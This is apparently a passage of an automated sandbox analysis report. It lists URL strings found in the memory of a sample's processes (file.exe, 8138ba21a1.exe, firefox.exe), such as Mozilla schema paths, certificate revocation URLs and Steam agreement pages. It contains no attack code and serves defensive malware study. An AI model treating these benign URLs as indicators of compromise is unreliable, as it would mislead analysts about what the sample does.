Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001D.00000002.2192132128.000001C968703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C967798000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F00D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C968803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96883C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2045805918.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2192132128.000001C96878E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001D.00000002.2232898347.000001C96928C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2192132128.000001C96875C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96884F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001D.00000002.2192132128.000001C968703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96881B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001D.00000002.2192132128.000001C968703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F516000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#http://json-schema.org/draft-06/schema#http://json-schema.org
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001D.00000003.2084605460.000001C9686D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2191911363.000001C9686E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2096194447.000001C96767B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appNamehttp://mozilla.org/#/properties/userFacingNamehttp://mozilla.
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value(browserSe
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/featurehttp://mozilla.org/#/proper
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slugLoginStore.prototype._dataPost
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabledOptional
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureIdRollou
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/featurehttp://mozilla.org/#/proper
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/valuehtt
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/targeting
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/brancheshttp://mozilla.org/#/properties/branches/anyOf/2http://mozil
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnithttp://mozilla.org/#/proper
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/totalhttp://mozilla.org/#/properties/userFac
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/branches/anyOf/0http
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIdsdisabled_shims.GooglePublisherTags
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollouthttp://mozilla.org/#/properties/bucketConfigUnique
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalPropertiesfiref
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slughttp://mozilla.org/#/properties/grease
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomeshttp://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersionhttp://mozilla.org/#/properties/id
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 0000001D.00000003.2110816799.000001C967DEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2149649708.000001C966C3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2078602546.000001C96899D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C9657BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2068314432.000001C967DC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2090715671.000001C96F110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2005986448.000001C9672F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2045805918.000001C968A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2078602546.000001C96898B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2074916361.000001C96891C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96AC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2110816799.000001C967DC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2045805918.000001C968A3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2085636271.000001C968969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2257955106.000001C96A69A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2087507345.000001C968991000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C9694CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2078602546.000001C96891F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2044345773.000001C96958B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2257955106.000001C96A673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2257955106.000001C96A6AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agre
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
